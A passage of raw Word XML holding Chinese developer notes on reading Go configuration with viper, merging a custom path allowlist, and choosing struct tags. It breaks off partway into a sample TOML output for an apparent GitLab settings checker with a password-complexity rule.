        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>的方式设置值。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Set()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">SetDefault() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>两个方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CF115A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    env := os.Getenv("GO_ENV")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D98F4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据配置的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取相应的配置信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355B3C23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if env != "" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081EE947" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>viper.SetConfigName(env)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E8109D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        viper.AddConfigPath(defaultPath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D221A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        viper.SetConfigType(configType)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1960DD5E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        err = viper.ReadInConfig()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3419201D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>这里继续重复进行读取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F1BE85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F26C0D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBFFD3A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6251BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E6BE4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591EF5AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C3AAB1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54780EA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD73261" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B46392" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>量来进行赋值传递</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515C9195" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6749EE26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[allowlist] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A420CA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if user_custom_configs["allowlist"] != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EC7599" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>var tmpConfigAllowlist map[string]interface{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74687659" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>tmpConfigAllowlist = make(map[string]interface{})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669139A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for k, v := range configs["allowlist"].(map[string]interface{}) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5CB4B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>tmpConfigAllowlist[k] = v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8DF1E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//fmt.Println(k)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F85021B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//fmt.Println(v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE9695" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D3A4A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>user_custom_configs_allowlist := user_custom_configs["allowlist"].(map[string]interface{})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F6771" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for k, v := range user_custom_configs_allowlist {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4110214F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if k == "paths" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DAA393" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>tmpConfigAllowlist[k] = v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C20A01" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0706ACC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261EC454" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>configs["allowlist"] = tmpConfigAllowlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055E9E4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19EB3335" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F18462D" w14:textId="75FE2A30" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A56C86" w14:textId="0F41188A" w:rsidR="004014B4" w:rsidRDefault="004014B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F572107" w14:textId="20F99FB9" w:rsidR="004014B4" w:rsidRDefault="004014B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23714497" w14:textId="17184393" w:rsidR="004014B4" w:rsidRDefault="004014B4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>toml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取到结构体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E50B4A" w14:textId="07E7F4E2" w:rsidR="004014B4" w:rsidRDefault="004014B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E40AA35" w14:textId="78A8DDC5" w:rsidR="00A56C25" w:rsidRDefault="00A56C25" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过测试，标注的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A56C25">
        <w:t xml:space="preserve">Description string </w:t>
      </w:r>
      <w:r w:rsidRPr="00A56C25">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>`toml:"description"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13991BAB" w14:textId="46FB0DBF" w:rsidR="00A56C25" w:rsidRDefault="00A56C25" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处最好不要写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>toml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而是写成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A56C25">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>`mapstructure:"advice"`</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会少一些读取不到的奇奇怪怪的错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE57275" w14:textId="77777777" w:rsidR="00A56C25" w:rsidRDefault="00A56C25" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6131231B" w14:textId="4442ADBE" w:rsidR="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>output</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.toml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F2FB47" w14:textId="77777777" w:rsidR="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351CBA3F" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># gitlab version with risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21CAE5" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[version]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D717C05" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35AFBAF0" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># admin setting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A34B0D" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[settings]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6082FE99" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[settings.password]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6E1B5C" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>check_rule="</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>密码复杂度检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
